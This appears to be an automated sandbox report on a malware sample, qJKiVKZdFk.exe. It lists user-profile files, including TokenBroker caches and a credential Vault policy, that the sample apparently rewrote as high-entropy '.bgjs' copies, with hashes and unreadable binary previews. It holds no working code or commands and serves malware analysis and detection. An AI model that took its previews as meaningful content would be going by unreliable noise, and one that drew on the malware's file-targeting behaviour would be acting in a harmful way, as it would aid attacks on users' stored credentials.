                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1350
                                                                                                                                      Entropy (8bit):7.847868609681164
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YQSMKGqPlHOQS/Q1QixGldyR/uhQtJjqPs94Ug9fTT4ge6QDlXfsWRKACgrzbD:Y+KnYHNZdOZJJ94UgBT4ga110AVD
                                                                                                                                      MD5:827DA30F257319E5C8ADFD618679AD58
                                                                                                                                      SHA1:98C68B4B23DEE1059E251F72504E3D83E77A580A
                                                                                                                                      SHA-256:AFBB1D0030FC9B3C949B1DA6BF3E245A185474671BA250D656011AD67AA0B4C8
                                                                                                                                      SHA-512:CA60CADE6E214D52144140DB70EFDE1981FA76F73E75D2944ECACE047CD9EF260DE1F87CD65A7C7F433B03014D753871F846E28F033927CB87C1A8554BEC9CA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"Rec..%.:[....dY..x..7..Cy...R6.1.6H..;.S.........S.}...\sR.$..wO..U.3...nP...a.V...-....98"v+..\Q{f......g..*%..V.|.H.F.1.<....h*.^.r.u.wr........N.L..A.M......A.....F,.o....2.T....ll..5...bxy..U...!.d...O..i.'.A7-.u;.9...*...>.WW{.....Q....o.."!.......Q..Fl.0...)+4'......o.3V........G.].:d.,..1...^....Q..G..4...xg.6.C............#.vM...".....VS~5.._1 CY.R..'..a.2.~w".....M.z...j.r..hYqg.-.....9.!....Z.].._|^a....@.'w...tz...K.....s..Uc[.bJ<.[V|# ?..nB.8.D9O\z...rY1..s.D.#..Y.....1G...Y....5..=......+.i.../..............i......'?A#. n6.a..'.6."..J.1.-..."..b..D..#....E..y.S..?..Kb.X.3.T.Y.~..A.q..693%....9yI...;.B...iw..<..@.bo....]OUZ...t+.*.^#..~...J..4.-.7..im..p3..c{..S..k...4"...GH.=5&C..').Y.hy...v...Q....3. .U.j....."a.\....&....U_( rcR......k.b....... ..<..J.4.:k:..J.A.F.,.A..H.,.d_.V'.f...x..,C..=~f..j[....{.q..(h...5..h..".Gz..7*.Z?6.......@.:.,l...&zi.f'T.\3.%H..d..`..e.Nd.)]m.?'~. k.....wO.x.0./.?..yW...S...?T...w.$...

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.929764162400561
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:igvErfCmBdvzsjwvXuXlxrYstbpO+PC8YqTAMozlYhtCgK9tD:i/LCmfsmuTrYcbpXRloxSdK9V
                                                                                                                                      MD5:88D818236CA82BD445A41E79DE17D411
                                                                                                                                      SHA1:31DD48972E18A746D59547E9DC73D9D19906A894
                                                                                                                                      SHA-256:4CDCCEDACE692C92D68340A7146808D44BA227D23A86059B4B9C5AAD01450566
                                                                                                                                      SHA-512:D5F1CD9572392FCBDFE075ACB7899F614BC27B5DEFCB0D6DD0519283F47A2C174239C848F7528C75B6CD01571EC3B375461667F162604737E26A2FB12ADD819C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".T.n...~........p.....{....k.l....d...b._B.....f.....8..b.-q..Fkw...;x.R.H.nn..ka.c...].qM.Z.J5f.Qk.m.3}....b....We2......F...m.Na....Y....6.....0.............q..9y....!l]=.u..G.I._6...u...,On.r.....|.+.O...+.......m.z.....JU...#......F...!QI..D.Ni.......ps..~j>.c.;.j.....|.n...$..T.P<cW.M|(2...<@..F......b.[G..Q.s..`..'.........m.4...".K......c.+.T..vS..~.v.^.......$..r.Y.yP.'....j.=X.)..oG@....va..{.-..;...i..n..........^.e..;..f.. ......V..7A..=..H}.R.....I....E3X....X.X..LFR......J..=E....~.6...7u.S..iJ..l@...}.a.3....k....^a&.G...~....+.t.o$.G.. FF..7z..Y..3........./.5...d.(...T..{...N.......)...Y.. o.y]...m......B.&.k.`..7.........h...Rl..V........@.41[_v..GD.G.........q..c..S.?je.T.b^....._.........}.Iw..zp.....pH...,..u[$xy(C9..^..m.....U.1...%..n.GWh.3...G.Z...JN.9T.8[3'w.....e-..wx.O%....F)t..%jH..t.9.z...I=...$..8q<W..HiA.9......X.G.1.H...n}.Zy x..4f=.....c/C.I...|.r....e{I.....{../2,`.|..@.....c.&8a.s}E....:..*(....

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\1521f696d8626c8e8127c0284ab987ff1974f39a.tbres.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.92109457486084
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xmT9RHMPd5pg8PRGfjUoWF4XELMOw0stg9CYN33d7mjUqkD:xQud7pP8jyLAtW3ojUZ
                                                                                                                                      MD5:61160148E420B0B449EB6EA677A2A2A5
                                                                                                                                      SHA1:BDF741507DD0711D1A7B473FC20A13030E7E009D
                                                                                                                                      SHA-256:F302E2245945708D5EE994E6B97008527EED962BB863231A37304E08871CD8DE
                                                                                                                                      SHA-512:FDF9ED19EA1228AE95C8AA8EF2001E521061AC932253D9EE10864E48D5216DC2E6F8105C13CB15822C95D5F53EF2D5574D94F5DFAB6E09E8FF4CF503FD7A78CE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".Td~.1.`.5K..+.aDONw..=......<?..H.'..T..V...p...R.d.*6.....9.....Ep.;F^......L..V..-,D..|P(...UV.[.N.S.9.%.Z..H.}{+..A.n..1.8...."c9..*......ej.d..s.. C...7..]....|.,.8..7...|7......N.$.$.,....)J....j..19A.p...Q.^e.S.........<..W...].P......M.......2...0]u..x..~1.fw..B...fF...K-.C.t.X.iB...&......i8.c..Z9/..........>.EYOM.|...+g......F..d.....?....Rq.X.....G0.WB...B'$K.1M...g@!.p%<..5<.....n....:.DZ.....t.?.8.......K.._.Y..0.B........1"V.k.Q[~...g.jIuf.....i9.)+.....n.CyY..D)..q..V.j......"..".1._..)E..;..w..Q.FE`..x..x.Gm.%..|..'.m..-=..n..]....k...4VA......7... .y~.._.s.#"..%.........<.&....d.;w._G$.:.._..df..{,.x^..6Q..I...X....d...E...eS.q......'..\b^.2n....f......3.5.|'....{rM.-....\N$.%J..EV..8w.....>...h..j...?......T. .q....f...7..+$y...gC...MR.[.....d.]Y..B...R...O|&.d.e..;. G..N&|{.. Z....../..|....G.N.....9..G.)....>..>Sm.$j..3q.B.L.."e0.....K.q.)j.q...Hc6...Z-x..p...=.o.......#.....].3..a..l..a..t\.%%.....h..)x

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3018
                                                                                                                                      Entropy (8bit):7.9330417609677735
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QDCO8LwlJlMLcP9D2xP8+sG79zmcYQ+Tvmds9bFr8zygKMBPD:QDOulMLcGU+N79zmc76OdubOrKMV
                                                                                                                                      MD5:C5BDE699DAB236DAFD5217058ABDC0D7
                                                                                                                                      SHA1:691A5A636DB52DE9DCC260BC937BA9F2792A08B7
                                                                                                                                      SHA-256:9CAD6745D7AB7D15973ADB012F2B1DCB9F0DDAC29D55AA7B0D7B84D9365BF3CB
                                                                                                                                      SHA-512:A2587CE81D8EA743BC7AF0288783B871AFCA51C73017FD7FC4D45392623010D470A923CCEBA75BCFDFF13EF945486CE2855748DA564C524088E0AA3071DA5633
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".TV.lA......GkE...B.. ...H(.L9.V..Zd.s.B.YUy.eB.1..l.VN.*Z..;..T...+.0..r+..z6...S....>..K.^J.K,.F.F.l.Q.].yl..<.......+.. ...&.L)...Z.....&.Wf..~.K.k9..6).V.@N..|0...8....R.x]..4..PG{.........?..o.Q.....H...........0y.c.W.d...p....D..m.......9..'.2.6.?4{=.>...h.;..e.}.F.{H....6.;.x.oB..`..|.S.'...J>i.u........B.x*..~...J..X....._7..M...7.-.U....L]..c.0t......5....y.3....Jf.w#.{.o|........(%.....4..4.\Zv.[f8...4o.n..u...s1..4~q^N.Y..io..?qa..4.~<:g{6.G."....Mp.....N.\.<..hG.......CE......%.._..V~.d.D..<...~..*J`...;......[..rc|..k....HY,./....])!.....S>RHA.....+...*..p\...7F...^...`e./|!j...9N.3Q4..6.......c,.%..ag.RS.}m....~.@......'........oy..$..$...^.Pcp.......b../4..7...K__...cd%.B.}....x4l..<..kQW./.HK|g...1j?.7....oHD#.1...6..0......)=..'..c.3_.&..|....(...V..f......|.,..O...P..@.>.\|..bj2....<.Yf......^r..e.x].X.p..L......s..|F0.S..>$..G.......S.Sy.IvSA=..k.e.....-6..s...@.B..v....:.L......bT.-Y.V.m44.Kck>4.......EIQ.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.932422950967811
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:c2DXrbNEYJc5F8UKz4XhkQSzbgJJOzYJjQWqxMvafvk80aC87QNa4+gaRLkSjGyB:c2DX/jm5F8JQybcgzY9Qnmv801yYSSyB
                                                                                                                                      MD5:5D35368FF18B5DB8D3474D65CB02DC4D
                                                                                                                                      SHA1:21BAB44DB6489F62A882286A2474EC8F78EA3DE8
                                                                                                                                      SHA-256:E4ACFC6EC3B03442CFB9824597004BB421388AA4D731CD70381FB257346AF74E
                                                                                                                                      SHA-512:B23B32B604957D07F245AF1B8013642A33E078ACE4CF14D7073CB1CA36707CFFF0AC5B0EEA071DF5907C88E50EEEEBD16E6942FED82389495C0E0A37923ED4CC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".T(c..B.=c"Iu/c#<..R5f,|.g....j.0m..1,..@`o.....L.<........r.~c...C..L.....Y6.T...?..6..x..3I........j...X.D...N..=...H.6..K\^w."..~.[/y..,.4....\.).C..r.X.[..N........{..,.#.....y.Fj.:]=."..E]...*..W..;..-..L.b2n....X..,..-7!.m1Fr.........mYPA....Q.9....}.H[.J.".5.r..V..?..[.w.>6..'.z..G)L...tamm.%.\J.x.#..E..X...D..c(9.....@\.U}.....o...Ds..V.`..Tt...k.D.<..8....0T....;.~..O.\...L.Cg.............m.=....M.R......G...m..#l..u.2v.O.n.[b.J..?...X...R.u..G`.$7....j.l>w4....... ...{+.m".[gU..Y..V..^......#.....'...v3..m...."{.+}o..R..I.K.)O.J.b?.o.]3..)#.[.......k.L....f..P.0.*.......E...(....n.}.3.@P...X.V..H.O..Q?.}*.Z......X..Q.;.o;$?..L.RX....D...y8.<.Nr...}._9....n.X..B.......<6E.k.d.I>.B..az.}.i.."..J.o."..'j...HN........*.!.&g.?........%...BR;U...ko..l'..]<..:.r.... .V....).((eCH..^.......C....'.K..i.Z......)...D.u7+.-O.G.....{..../.{....C}v.....J. ..[.aomL..G.t.j.o..?..6'"P.h\.....#.....e....x.:.<I.'p,...KarD.>?..hd.@

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4956
                                                                                                                                      Entropy (8bit):7.966703814417489
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:ab+ZM/zQoeg6AVleVLocnQzw2gkhLuK3bNk0QUQSE1f+niWzKzo:aCQm5ocnP2gkhLuiimiiK0
                                                                                                                                      MD5:D275413F55178244C1FB916F876F05A7
                                                                                                                                      SHA1:2E27696B4352DE6772C4E90745B17B3598E50524
                                                                                                                                      SHA-256:E3453D74008BEFE31EBDCF8A355BCEE83CA7AD48D8F86B088F97DBB50B8E871A
                                                                                                                                      SHA-512:5BD632463A2DF7227A97D233958A758194DF00C703940E90C011D158EB232630E17DD6FFB8A53D0F13DE2242B8E06200986B0D1F2C18274CC2A3CC197CFAACF5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".TT("..;pF......_..&.%...S.....1..5AYAkg.......g..+...:....~...0-...!C.\..,/...I.......pk.!.....j....,fX...kg...6.e...|:.......j...n%)I,ce....Hz.g6.......v>.D.......'..^a.n.s..r.PQU. .:.s..rxv...K..O7...{.-...,..]..c..I#../...Q9(4n...C.,.y.D?.tQ(.`+.@...:..v.C#..Ch.....Rp._8`...9......!u..h......&.S.,..d.W.Vg.E.u....04&*...d]x..~q..}.hO.b.y"...t.L.6n.&..Y.$_.b..<.!...E...%R..K..=...s.%)..F...n..Ny.pI..9.q/....[..!.b.r.Y."...W~hL4.OK..|^2.... .....A6...&yK..n7.....:.....B..+.a...>.-/.'...1.....?.....D.de...A....a.....io._...|7.....d}...|.jp|.....)...^T.f..WD..^z..K...!.\>.......Aa...j..Y....... .R.........p.b6..).A....).=...L..0:...~...pI.Bq....o..@4D.....D...a[.....tu......Sf..................S.V.S...q}...x0....5.FA..>T....Yl46.%2x6..[\...k.J.L.......Q}K.!...\._...l...F...j..XgG%.:.p*^p......Q........v..{.6C....vTv..r3.nk......0a.....yQ.a...'........G.......q....8..cz..g......Z.....+0[.bn$.>...v.\.Y...)..2k..o...0..,D.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3018
                                                                                                                                      Entropy (8bit):7.940076964585109
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xzI5dwv5wT3KuGQlqMbobC+229r5GYE688KOgmvxSpy/vbrpMdD:xzod05YbwM+F2erA362hmpKWvbrpMl
                                                                                                                                      MD5:1B31162DFCC3455DAF2078CECC6541C3
                                                                                                                                      SHA1:0D611EF629C58BBBDD7F775976DB25E0CB044EE6
                                                                                                                                      SHA-256:2790565F70C06C88E957338A870E518FC3D27AAF0C20E55687813AD79FBFF806
                                                                                                                                      SHA-512:C2328EE7A8871AF3B7C5B1D691FBE1427E55071E0CDC981EE031243A95669601105F684BE1F2AC79D407CC20BF95C8D685E9BE34EF02A5FCC71F7322F236EFBD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".T..u`?q.....E.r.X.......<f...Z.v.....$.1\h..._LK.....H.g.......V4V.8..;...T....@.D. .G....[...~...)...|..T.vM2M.{.o.\iF....Jy..4.Q.. 9U..QN..H.O..wb................CP....n...`...g...6.9..\.c..Y..G ...O..$..A...-Q..4...J.{.&.eJ/.2.#........!..@.3.JIh4"..R.-.w...K...Bu...>......n.d.IzBc2....8'....3..;>..[.S..0.^..M.2d.G....!.G......P.b(..V8t..u.)|.=.w..U.#...8.{.^+..,..6....o6...w.X|.r..........|..J...........Qr.'.{.....f.U.#v5X.H..+#.L..n[>.D..W..K......Q........\..n...Y...t.T.o..9S...1;.x..&(...\.K2...o2.Jt@N.u.w....q,._.]$..]hZ.\.{...\.7=..i.d<=......>..gCm`.ph>b.9.s.....y.8dOd.K....y....&Z.%s.R<.|..v.0P........i;.8..C.8..G..q.h.........&.Z...a..f.c./...c......4..-;.!.f....,..l........I..|}1..*.OI....1k,(;.;..C.+../.1/..f(Nc........g...<.......HxX\.`z6l=.io.p...F.a.2......)."K.CV$\....|K...pA.>.<....n....8.5..P~%_.v}.r..>..Y?b.c...iO....5...ll.c..W.N....Y..W..y.w.J..4F8...4.-Z....a...4$>......,..m....X.y.N3.~..._...;.Z.?@$u.....,N..

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\f036564d8b727dbe99499799c7e51936a642f62a.tbres.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.922186538328433
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Ad6VaAd3zx/mljtK0zFRmPjYOyJewjH8/8KR3McAnO35fBX4e3qG9T81JFID:Ad6R3zx/mhK0z3jJjH8/p2nO3Xt3LGFU
                                                                                                                                      MD5:95C2898A16B9FFB770C2DE6B18EF2A2D
                                                                                                                                      SHA1:2431FB0AD9D7411F23BA3CC4D205173F01CFF209
                                                                                                                                      SHA-256:92E3EE044BDE440AC78C02DBF6B2F90B880A6617B1D3B5E9CC7F1710D83D29AD
                                                                                                                                      SHA-512:00A99DB8303FDF07FB96D2BB8E33D2A05B96C1A8C8D507DFC6B8F99FAF051BC55115C3F106AC2D79BB47768823A9573BB9C12EC78D693EA7389BD1D9492EAEB8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".TayV...a.Z........QN..e...I.........I....FS........`.....l.<.dRL.o....)'.3.x.."....>o.;.+..,.q<...N...8z/S.SM...*.......G..`..........1(.5......D....i...8<wWe.F....h........C*9].p.O.\.=U......<....A........X..K..........8..M.Q6[.~...[E......j8.-+.g.....UM....:.n6.M....g..<./......G.B....J...>..b.....B., m.B{.B.(....2m..zfi..h.?.dIItb.ds.*H`............`.T.........9.G\.....r....q2B.T>.G..Q.5.{.R\.4Ha..n.."r=..Qi..V..KG...9...D:......3J7.2..;{k....h.e......%T...Z......}.fI...o,..NFSEp5.sk.S...l.?v(..he.*.F....Fn.2...v...-o.~ z.g...w.L!|.2....f-..:55V...@E...p\N.Xu.......V....4....*.\%.".d0.B..5..oK.@.7.;~#nRj..#77.=.%.......+=.&...I.....a.M.....#.3..@|.x..z..RH<.:....MsV.~...YQ'.i...t~A..)w?k.rIh./.y:.G....\N=.G....N..Q...Wi..U.V&a.yV!,.tq.E...2.........U]..noWC.R.|.......l&..M../7.&u ..Q0^lZ..f.......|u......#.q.M..Od'C.:.o.....yJ...d..9..s.[..|.+.Z#X,|Bu....U..~..b....M."&.\.3.d.l.L...I=..y{..z...6Ts..PB7W......._.d.6....B6.B

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):770
                                                                                                                                      Entropy (8bit):7.676327824362269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8TCEcWCCUdBtAqOU2lxl9HYCnLjjrqdS0+7bD:8TzcWxGBCqhkz9HYCn6d+/D
                                                                                                                                      MD5:B82BAEC630FAA76C8324F36344432A5A
                                                                                                                                      SHA1:72DB8D92A6234EDE7C8296CA9FDF89DD84DC1FCB
                                                                                                                                      SHA-256:B2DADDB40F5BD5173F4B5DAE0327BC5640B52CF56B5E2791BEFEFCCA3C6DF34C
                                                                                                                                      SHA-512:E51A50BC051896345BAAD3417844B2036366FD78DA0F359F079B8146DCB0C0CE78AEBC1FB604047D5A50724C256C19B6AA943D228163D54731BE013D6F7695C7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....B)c....Oo.?..pW.....l......:!v.YZ_..x@./.}u.".l[vz./..D...?.@...$.J....t.d...Pl....... c.o.J.6hO.`5.]x....U..h.`N........3.]......B...#i.2`.:..x...w......1..{..".J.<.:.....7..Ue.M..;Pq<@.nY;.....DL._....|..e.@...W...sL..kc...v..R..m..2k...i......T:......z..+..;80.V.O.....:z.]....aN..~.8.3.e......X.I..."..R..2...T.e.`I ....m..*(..f.......A...<..5b.+.i.. .A..B..e..k.HT...u,....=....|....T#....3*.i#~..'..%O....R%.Z<p.V..........A.h.....,.....o...I../.~..%....A.....g..,..(.q......X.Og..A..Y.....[.J'3HO..P.H:...={....$.*.K..O.......!.E.......Od...T........+..],...@<w.Y.PJ.c....jp...c..R.`.m.....3.....$P..*...$.....S.1.\P...87..@o..b.w...Z'..+.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\2057\StructuredQuerySchema.bin.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):424152
                                                                                                                                      Entropy (8bit):6.332058672226218
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:dAJ83nJEWxJ80n9nm+vyJfbnQkK96B88yKv4bWTmTvEiLSQo:d68nxJh9nm+6dF4/Bo
                                                                                                                                      MD5:E08C89F9A847A57A0FA5EEF3B2678DD3
                                                                                                                                      SHA1:50E1754BA91F99284CC2A591BB0E3F0E0C5F4D16
                                                                                                                                      SHA-256:2EAEE5FBB915435181D790C7BC6851A3D02F0870E46D39F09B5C5B270A34CA2C
                                                                                                                                      SHA-512:E19124D0B9AE6229E86D46A3F880A9DB752F6709BEC01BF2F154C1BCF66973EE4EBA89E6836C4D4B801069F92E7938FBF7D0F5A03B033E8C575896E2C3128F0E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...P.6p&i...A..>o..<7.6.s...2..EZ...6.........E1.x.}..t.$....b.....Z.L.<}...N0..)..a....a..s..*.'.k+..y...h..P........{.nJ_q..Ks..5J..o...c}..*..H8...}.]..1.z.1.(.f....ZX..g{...w9..DVz..,..|E....cE.......G ..W./x.E?C.Km..!..r......*.q...lB..&2T.<..c...sJ..O....l.F,./.?.....3.w.......AN.~.$Nd.S.7h#.Z...P.k.y:.. .A|ew...l.:v..7.e.....~...J[..h'...Ns..X^~.'o.;.....c....*...k.....%<?().....~...@J.B...9.(.....w..X|...YfR....u..........>#.9..........w9...47r.|e....A._!i..n..;.]6.fw.....r..9.4...3.%...\.Z.<.W.....kl.~..6..:{.7=.q......R ...2?..C..4..^..J...w6...........:....1.Q...p| y.u....V....d.O..~'9j..O.G>...`2...\dW.7.-."..KT...t.)pH....;tGp-...i_}..r.d.....Z.$...=..T..n...Y..K.....h..$M......./.;Rf........rE..+.Tt4.u).)\@...`I.\.......ZV.>>:../..s.v..p(.....'./'...j^X..!.ehZj.pnS....KEN. .....N. ...~.#!TJ..?.qm.2.$..7)..;..(f....<...Vz...<.F*.....1....J.7dwx,...F..{..g....e..I..].6D$*!.f....zd=.<............;....]"..$}.;.....lg%RbF.d.^;........

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.1.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.988749404241901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:iNsvI9TyJ6/UPoU9UugXEXOtexJrxlr0ykA4cIWSwMdPn4nRInxxLrsCmp+:iqvMOocHY0+M9oykAvfe4OrsW
                                                                                                                                      MD5:4B6401C4801CF6F105F323FDBC4A4F6F
                                                                                                                                      SHA1:49BC4524EA1949723CCEC7E438A152DF55BD2FE3
                                                                                                                                      SHA-256:AAAAC9643AB6CEE93CF498712BE14B22C91B73A32E1B3BFA9F453CC49D829AC8
                                                                                                                                      SHA-512:7C3866510935DE66AD0B188E78D540D0BF99B21B4212C0BC69FE275980286AC89346A1F2C0CEF8D6E54DBCE7CAE1871E7DD6DE7D94C70828ACECCEF4819C35CB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.... ...(..f.H......HB.....E....q(...;r.......4.6.zGD...Y.=....Zj.....y4..2.....E...F.y.....i....7..&.*....4.......A|IQB........n.U\F..`m4.zFnmC.!..UIF?.Z.I).[m.mU..<.U-X.3e5>m.....V=a...@#TI........f..D.8..._f...Tf.?...i.k.....&.:t....xX...(...]f.A.....a(..%u.?..y....../o....e.....8.[k...QV..6..d.T.y*....u..m_P.,E..\...p..zS...{...E..k..+..........{V1...~.1o|%.J&.>..........D.J#g..w3A|...5....-60..Y.5T.-.ol~KV......+p[\R...Te.....2.........K...y.....W........'#..<...'.....k.u.E.|.f..2W. .m..h\]....a..L.W~...u....p..HN...8.&.[^;%...!.%s..K..,.....*../..q| .7.!....)..rf=.p.......q.^.~.c.=..Z;x|..7..%%"4Lk.(.Fk......o..hE59.Ye+.5H.^....h..y....O.$..X.l...Fv...aMbb..Zu.H......F..F...U.#[.............^..y....D.....K...c..?.%4...n.....+.oxeA..m.....|..2.p....DY.>h{"L)A0. ..H=..SS.p..&.7Y.8c[p..f.........`V.].D..e.V..V..p.x..."I^T1..;E.CYj...;:..;..u....ai\..T1$.^`y~....\T|..g1.....m.~.....-..a..B..V.f3LG.F.`5....f...73.*....k.`\..... .{.H...;V

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.3.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.986054237828975
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9jZszeQdiYxo7mF7bmCJVnwuN8sAc+g+Zs0pzuGKp:BZbQ8MFX/JVnwlcX++0+
                                                                                                                                      MD5:28110FE47526A02AB62A66E39FBE516B
                                                                                                                                      SHA1:54158A5E7706CAA634322B697FBA77BDBD79EA87
                                                                                                                                      SHA-256:15C17B74D6F2E624A0B4FD4ACD3E99BF3622DC825EB7006274383A402BDC6C47
                                                                                                                                      SHA-512:90F36E9AA7C87C7E4A9D27BAAF6AA2DABFADD352EF9951EC5E009A144AB2261729E068D8CEC473DA677086204CF0904365FA1ABE76C1A50571FE19B5B6481B77
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....`UJg.n.k..rMq.Q.m.....W..\...v....0...8Bsr...R.FK....O1..B.....0l...{.y.O.tXA.Hu:k.|5W'.65..uFiv.1..+LcB.pg....lD?h ..{8.5.;..S0N.M..g..\.q.......1`.OI...m.............(!.S........}O.....]B......G..q..T....ml....U.7i.~.........i.KY..n........4,A....t.*.T..O. .....jLE...\m.M....0Ss.."....Ww..w..>.>...{3`.@+Z.Z.'.|.Vc$ ..<.3.j...ae...`+}.9.....-jVq..3x.{c4V.XU..).z.?<..L..B._.e.IvHI..h.0.v..q4........`..e..l..8..3..(..DHuh....J,...'5\[.}.[..San9....e S...........7@.N\....p.mnUb..C..FT.k..xfz.8/.u.L........w.....pn...X0y.8t...s...._.u.$j.9VX.....'9/7cZ.@.;6.....Y.G....4..Y.S.=1.@d....BgR!.......P.j.....~2`.QG....W<}.. iJ...j.. X.z0...;......o..&.H...K .r..f...b.7).6e/..u.yj...!T.>....K..u7..u@b ..^..SF...|..H....l.W.j...]..*k"OK..<i.....<gB.C....D.H..\W..ps[.3{3..s.Ih..tu.K...o-..r.@....U6'..3..L.M.C4..GY(..[|..}..7.....F-..[.g?...c..i.)@..&V..B....="...5wo....6..4..XL..&.u..r~GW^Dz..O8.M9.d .2.....<\.......a.5..m.....Y|e...RS..J.fp.2.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Caches\{0325ABFA-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):424190
                                                                                                                                      Entropy (8bit):6.332015976653587
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:DY4+B2tuC1pqx4Q2rJDm+vyJfbnQkK96B88yKv4bWTmTvEiLSC:DYJ2tVpvQEm+6dF4/R
                                                                                                                                      MD5:D71A1C8025B90876E60D6A8388D9D7EF
                                                                                                                                      SHA1:5FFE1FDDB4AC78E97D6135BA2DD9CB178FC64B2B
                                                                                                                                      SHA-256:1766B4B661016056EF72A1DD7EA9A09C6DE92EAAE5B3903FB4EB57ADE8AB82E4
                                                                                                                                      SHA-512:63629A908DB5DF8F03C11FFD881C4A6B7C267FDB61343B693FDA51353C287CA5EFD2BF68FA5E0D0FB76193908C0EDAB64F4DE1128A0DDA8A855001FE75546ED9
                                                                                                                                      Malicious:false
